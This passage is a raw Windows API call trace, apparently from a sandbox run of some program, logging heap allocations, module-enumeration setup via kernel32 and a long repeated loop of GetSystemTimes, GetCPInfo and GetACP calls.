[0111.570] SetLastError (dwErrCode=0x0) [0111.570] GetLastError () returned 0x0 [0111.570] SetLastError (dwErrCode=0x0) [0111.571] GetLastError () returned 0x0 [0111.571] SetLastError (dwErrCode=0x0) [0111.571] GetLastError () returned 0x0 [0111.571] SetLastError (dwErrCode=0x0) [0111.571] GetLastError () returned 0x0 [0111.571] SetLastError (dwErrCode=0x0) [0111.571] GetLastError () returned 0x0 [0111.571] SetLastError (dwErrCode=0x0) [0111.571] GetLastError () returned 0x0 [0111.571] SetLastError (dwErrCode=0x0) [0111.571] GetLastError () returned 0x0 [0111.571] SetLastError (dwErrCode=0x0) [0111.571] GetLastError () returned 0x0 [0111.571] SetLastError (dwErrCode=0x0) [0111.571] GetLastError () returned 0x0 [0111.571] SetLastError (dwErrCode=0x0) [0111.571] GetLastError () returned 0x0 [0111.571] SetLastError (dwErrCode=0x0) [0111.572] GetLastError () returned 0x0 [0111.572] SetLastError (dwErrCode=0x0) [0111.572] GetLastError () returned 0x0 [0111.572] SetLastError (dwErrCode=0x0) [0111.572] GetLastError () returned 0x0 [0111.572] SetLastError (dwErrCode=0x0) [0111.572] GetLastError () returned 0x0 [0111.572] SetLastError (dwErrCode=0x0) [0111.572] GetLastError () returned 0x0 [0111.572] SetLastError (dwErrCode=0x0) [0111.572] GetLastError () returned 0x0 [0111.572] SetLastError (dwErrCode=0x0) [0111.572] GetLastError () returned 0x0 [0111.573] SetLastError (dwErrCode=0x0) [0111.573] GetLastError () returned 0x0 [0111.573] SetLastError (dwErrCode=0x0) [0111.573] GetLastError () returned 0x0 [0111.573] SetLastError (dwErrCode=0x0) [0111.573] GetLastError () returned 0x0 [0111.573] SetLastError (dwErrCode=0x0) [0111.573] GetLastError () returned 0x0 [0111.573] SetLastError (dwErrCode=0x0) [0111.573] GetLastError () returned 0x0 [0111.573] SetLastError (dwErrCode=0x0) [0111.573] GetLastError () returned 0x0 [0111.573] SetLastError (dwErrCode=0x0) [0111.573] GetLastError () returned 0x0 [0111.573] SetLastError (dwErrCode=0x0) [0111.573] GetLastError () returned 0x0 [0111.573] SetLastError (dwErrCode=0x0) [0111.573] GetLastError () returned 0x0 [0111.574] SetLastError (dwErrCode=0x0) [0111.574] GetLastError () returned 0x0 [0111.574] SetLastError (dwErrCode=0x0) [0111.574] GetLastError () returned 0x0 [0111.574] SetLastError (dwErrCode=0x0) [0111.574] GetLastError () returned 0x0 [0111.574] SetLastError (dwErrCode=0x0) [0111.574] GetLastError () returned 0x0 [0111.574] SetLastError (dwErrCode=0x0) [0111.574] GetLastError () returned 0x0 [0111.574] SetLastError (dwErrCode=0x0) [0111.574] GetLastError () returned 0x0 [0111.574] SetLastError (dwErrCode=0x0) [0111.574] GetLastError () returned 0x0 [0111.574] SetLastError (dwErrCode=0x0) [0111.574] GetLastError () returned 0x0 [0111.574] SetLastError (dwErrCode=0x0) [0111.574] GetLastError () returned 0x0 [0111.575] SetLastError (dwErrCode=0x0) [0111.575] RtlAllocateHeap (HeapHandle=0x1f70000, Flags=0x8, Size=0x98) returned 0x1f71a00 [0111.575] RtlAllocateHeap (HeapHandle=0x1f70000, Flags=0x8, Size=0x1f) returned 0x1f71aa0 [0111.575] RtlAllocateHeap (HeapHandle=0x1f70000, Flags=0x8, Size=0x36) returned 0x1f71ac8 [0111.575] RtlAllocateHeap (HeapHandle=0x1f70000, Flags=0x8, Size=0x37) returned 0x1f71b08 [0111.575] RtlAllocateHeap (HeapHandle=0x1f70000, Flags=0x8, Size=0x3c) returned 0x1f71b48 [0111.575] RtlAllocateHeap (HeapHandle=0x1f70000, Flags=0x8, Size=0x31) returned 0x1f71b90 [0111.575] RtlAllocateHeap (HeapHandle=0x1f70000, Flags=0x8, Size=0x17) returned 0x1f71bd0 [0111.575] RtlAllocateHeap (HeapHandle=0x1f70000, Flags=0x8, Size=0x24) returned 0x1f71bf0 [0111.575] RtlAllocateHeap (HeapHandle=0x1f70000, Flags=0x8, Size=0x14) returned 0x1f71c20 [0111.575] RtlAllocateHeap (HeapHandle=0x1f70000, Flags=0x8, Size=0xd) returned 0x1f71c40 [0111.575] RtlAllocateHeap (HeapHandle=0x1f70000, Flags=0x8, Size=0x25) returned 0x1f71c58 [0111.575] RtlAllocateHeap (HeapHandle=0x1f70000, Flags=0x8, Size=0x39) returned 0x1f71c88 [0111.575] RtlAllocateHeap (HeapHandle=0x1f70000, Flags=0x8, Size=0x18) returned 0x1f71cd0 [0111.575] RtlAllocateHeap (HeapHandle=0x1f70000, Flags=0x8, Size=0x17) returned 0x1f71cf0 [0111.575] RtlAllocateHeap (HeapHandle=0x1f70000, Flags=0x8, Size=0xe) returned 0x1f71d10 [0111.575] RtlAllocateHeap (HeapHandle=0x1f70000, Flags=0x8, Size=0x69) returned 0x1f71d28 [0111.575] RtlAllocateHeap (HeapHandle=0x1f70000, Flags=0x8, Size=0x3e) returned 0x1f71da0 [0111.575] RtlAllocateHeap (HeapHandle=0x1f70000, Flags=0x8, Size=0x1b) returned 0x1f71de8 [0111.575] RtlAllocateHeap (HeapHandle=0x1f70000, Flags=0x8, Size=0x1d) returned 0x1f71e10 [0111.575] RtlAllocateHeap (HeapHandle=0x1f70000, Flags=0x8, Size=0x48) returned 0x1f71e38 [0111.575] RtlAllocateHeap (HeapHandle=0x1f70000, Flags=0x8, Size=0x12) returned 0x1f71e88 [0111.575] RtlAllocateHeap (HeapHandle=0x1f70000, Flags=0x8, Size=0x18) returned 0x1f71ea8 [0111.575] RtlAllocateHeap (HeapHandle=0x1f70000, Flags=0x8, Size=0x1b) returned 0x1f71ec8 [0111.575] RtlAllocateHeap (HeapHandle=0x1f70000, Flags=0x8, Size=0x24) returned 0x1f71ef0 [0111.575] RtlAllocateHeap (HeapHandle=0x1f70000, Flags=0x8, Size=0x29) returned 0x1f71f20 [0111.575] RtlAllocateHeap (HeapHandle=0x1f70000, Flags=0x8, Size=0x1e) returned 0x1f71f58 [0111.575] RtlAllocateHeap (HeapHandle=0x1f70000, Flags=0x8, Size=0x41) returned 0x1f71f80 [0111.576] RtlAllocateHeap (HeapHandle=0x1f70000, Flags=0x8, Size=0x17) returned 0x1f71fd0 [0111.576] RtlAllocateHeap (HeapHandle=0x1f70000, Flags=0x8, Size=0xf) returned 0x1f71ff0 [0111.576] RtlAllocateHeap (HeapHandle=0x1f70000, Flags=0x8, Size=0x16) returned 0x1f72008 [0111.576] RtlAllocateHeap (HeapHandle=0x1f70000, Flags=0x8, Size=0x2a) returned 0x1f72028 [0111.576] RtlAllocateHeap (HeapHandle=0x1f70000, Flags=0x8, Size=0x29) returned 0x1f72060 [0111.576] RtlAllocateHeap (HeapHandle=0x1f70000, Flags=0x8, Size=0x15) returned 0x1f72098 [0111.576] RtlAllocateHeap (HeapHandle=0x1f70000, Flags=0x8, Size=0x1e) returned 0x1f720b8 [0111.576] RtlAllocateHeap (HeapHandle=0x1f70000, Flags=0x8, Size=0x2a) returned 0x1f720e0 [0111.576] RtlAllocateHeap (HeapHandle=0x1f70000, Flags=0x8, Size=0x12) returned 0x1f72118 [0111.576] RtlAllocateHeap (HeapHandle=0x1f70000, Flags=0x8, Size=0x18) returned 0x1f72138 [0111.576] RtlAllocateHeap (HeapHandle=0x1f70000, Flags=0x8, Size=0x46) returned 0x1f72158 [0111.576] HeapFree (in: hHeap=0x1f70000, dwFlags=0x0, lpMem=0x1f711f8 | out: hHeap=0x1f70000) returned 1 [0111.578] RtlAllocateHeap (HeapHandle=0x1f70000, Flags=0x8, Size=0x800) returned 0x1f721a8 [0111.578] RtlAllocateHeap (HeapHandle=0x1f70000, Flags=0x8, Size=0x80) returned 0x1f711f8 [0111.578] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x404e49) returned 0x0 [0111.579] RtlSizeHeap (HeapHandle=0x1f70000, Flags=0x0, MemoryPointer=0x1f711f8) returned 0x80 [0111.579] GetLastError () returned 0x0 [0111.579] SetLastError (dwErrCode=0x0) [0111.579] GetLastError () returned 0x0 [0111.579] SetLastError (dwErrCode=0x0) [0111.579] GetLastError () returned 0x0 [0111.579] SetLastError (dwErrCode=0x0) [0111.579] GetLastError () returned 0x0 [0111.579] SetLastError (dwErrCode=0x0) [0111.579] GetLastError () returned 0x0 [0111.580] SetLastError (dwErrCode=0x0) [0111.580] GetLastError () returned 0x0 [0111.580] SetLastError (dwErrCode=0x0) [0111.580] GetLastError () returned 0x0 [0111.580] SetLastError (dwErrCode=0x0) [0111.580] GetLastError () returned 0x0 [0111.580] SetLastError (dwErrCode=0x0) [0111.580] GetLastError () returned 0x0 [0111.580] SetLastError (dwErrCode=0x0) [0111.580] GetLastError () returned 0x0 [0111.580] SetLastError (dwErrCode=0x0) [0111.580] GetLastError () returned 0x0 [0111.580] SetLastError (dwErrCode=0x0) [0111.580] GetLastError () returned 0x0 [0111.580] SetLastError (dwErrCode=0x0) [0111.580] GetLastError () returned 0x0 [0111.580] SetLastError (dwErrCode=0x0) [0111.581] GetLastError () returned 0x0 [0111.581] SetLastError (dwErrCode=0x0) [0111.581] GetLastError () returned 0x0 [0111.581] SetLastError (dwErrCode=0x0) [0111.581] GetLastError () returned 0x0 [0111.581] SetLastError (dwErrCode=0x0) [0111.581] GetLastError () returned 0x0 [0111.581] SetLastError (dwErrCode=0x0) [0111.581] GetLastError () returned 0x0 [0111.581] SetLastError (dwErrCode=0x0) [0111.581] GetLastError () returned 0x0 [0111.581] SetLastError (dwErrCode=0x0) [0111.581] GetLastError () returned 0x0 [0111.582] SetLastError (dwErrCode=0x0) [0111.582] GetLastError () returned 0x0 [0111.582] SetLastError (dwErrCode=0x0) [0111.582] GetLastError () returned 0x0 [0111.582] SetLastError (dwErrCode=0x0) [0111.582] GetLastError () returned 0x0 [0111.582] SetLastError (dwErrCode=0x0) [0111.582] GetLastError () returned 0x0 [0111.582] SetLastError (dwErrCode=0x0) [0111.582] GetLastError () returned 0x0 [0111.582] SetLastError (dwErrCode=0x0) [0111.582] GetLastError () returned 0x0 [0111.582] SetLastError (dwErrCode=0x0) [0111.582] GetLastError () returned 0x0 [0111.582] SetLastError (dwErrCode=0x0) [0111.582] GetLastError () returned 0x0 [0111.582] SetLastError (dwErrCode=0x0) [0111.583] GetLastError () returned 0x0 [0111.583] SetLastError (dwErrCode=0x0) [0111.583] GetLastError () returned 0x0 [0111.583] SetLastError (dwErrCode=0x0) [0111.583] GetLastError () returned 0x0 [0111.583] SetLastError (dwErrCode=0x0) [0111.583] GetLastError () returned 0x0 [0111.583] SetLastError (dwErrCode=0x0) [0111.583] GetLastError () returned 0x0 [0111.583] SetLastError (dwErrCode=0x0) [0111.583] GetLastError () returned 0x0 [0111.583] SetLastError (dwErrCode=0x0) [0111.583] GetLastError () returned 0x0 [0111.583] SetLastError (dwErrCode=0x0) [0111.583] GetLastError () returned 0x0 [0111.584] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76d30000 [0111.584] GetProcAddress (hModule=0x76d30000, lpProcName="CreateToolhelp32Snapshot") returned 0x76d6735f [0111.584] GetProcAddress (hModule=0x76d30000, lpProcName="Module32FirstW") returned 0x76d679f9 [0111.584] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x0) returned 0x78 [0111.587] Module32FirstW (hSnapshot=0x78, lpme=0x18fac8) returned 0 [0111.587] PeekMessageA (in: lpMsg=0x18fa44, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x18fa44) returned 0 [0111.587] GetTickCount () returned 0x114d05a [0111.587] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.587] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.587] GetACP () returned 0x4e4 [0111.587] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.587] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.587] GetACP () returned 0x4e4 [0111.587] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.587] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.588] GetACP () returned 0x4e4 [0111.588] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.588] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.588] GetACP () returned 0x4e4 [0111.588] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.588] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.588] GetACP () returned 0x4e4 [0111.588] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.588] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.588] GetACP () returned 0x4e4 [0111.588] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.588] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.588] GetACP () returned 0x4e4 [0111.588] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.588] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.588] GetACP () returned 0x4e4 [0111.588] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.588] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.588] GetACP () returned 0x4e4 [0111.588] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.588] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.588] GetACP () returned 0x4e4 [0111.588] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.589] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.589] GetACP () returned 0x4e4 [0111.589] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.589] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.589] GetACP () returned 0x4e4 [0111.589] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.589] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.589] GetACP () returned 0x4e4 [0111.589] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.589] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.589] GetACP () returned 0x4e4 [0111.589] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.589] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.589] GetACP () returned 0x4e4 [0111.589] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.589] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.589] GetACP () returned 0x4e4 [0111.589] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.590] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.590] GetACP () returned 0x4e4 [0111.590] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.590] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.590] GetACP () returned 0x4e4 [0111.590] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.590] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.590] GetACP () returned 0x4e4 [0111.590] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.590] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.590] GetACP () returned 0x4e4 [0111.590] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.590] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.590] GetACP () returned 0x4e4 [0111.590] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.590] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.590] GetACP () returned 0x4e4 [0111.590] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.590] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.590] GetACP () returned 0x4e4 [0111.591] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.591] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.591] GetACP () returned 0x4e4 [0111.591] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.591] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.591] GetACP () returned 0x4e4 [0111.591] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.591] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.591] GetACP () returned 0x4e4 [0111.591] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.591] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.591] GetACP () returned 0x4e4 [0111.591] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.591] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.591] GetACP () returned 0x4e4 [0111.591] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.591] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.591] GetACP () returned 0x4e4 [0111.591] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.592] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.592] GetACP () returned 0x4e4 [0111.592] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.592] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.592] GetACP () returned 0x4e4 [0111.592] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.592] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.592] GetACP () returned 0x4e4 [0111.592] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.592] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.592] GetACP () returned 0x4e4 [0111.592] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.593] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.593] GetACP () returned 0x4e4 [0111.593] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.593] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.593] GetACP () returned 0x4e4 [0111.593] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.593] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.593] GetACP () returned 0x4e4 [0111.593] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.593] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.593] GetACP () returned 0x4e4 [0111.593] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.593] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.593] GetACP () returned 0x4e4 [0111.642] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.642] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.642] GetACP () returned 0x4e4 [0111.642] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.642] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.642] GetACP () returned 0x4e4 [0111.642] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.643] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.643] GetACP () returned 0x4e4 [0111.643] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.643] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.643] GetACP () returned 0x4e4 [0111.643] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.643] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.643] GetACP () returned 0x4e4 [0111.643] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.643] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.643] GetACP () returned 0x4e4 [0111.643] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.643] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.643] GetACP () returned 0x4e4 [0111.643] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.643] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.643] GetACP () returned 0x4e4 [0111.643] GetSystemTimes (in: 